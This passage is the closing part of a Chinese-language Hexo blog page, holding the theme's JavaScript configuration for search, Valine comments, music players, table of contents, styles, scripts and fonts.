            bitcoin : "",
            alipay  : "/image/donate/wechat.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Valine : {
            switch         : true,
            el             : ".comments-content",
            appId          : "srhKtvWPQTWYKh3qX8G8M7v0-gzGzoHsz",
            appKey         : "8uVSP1q6UlALVC5igYfIfv2h",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "APlayer"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : true,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "知我",
                        artist : "剑来",
                        cover  : "/music/cover/preview.jpg",
                        url    : "/music/song/知我.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : true, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : false
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js"
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "简单地活着, 肆意又精彩."
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>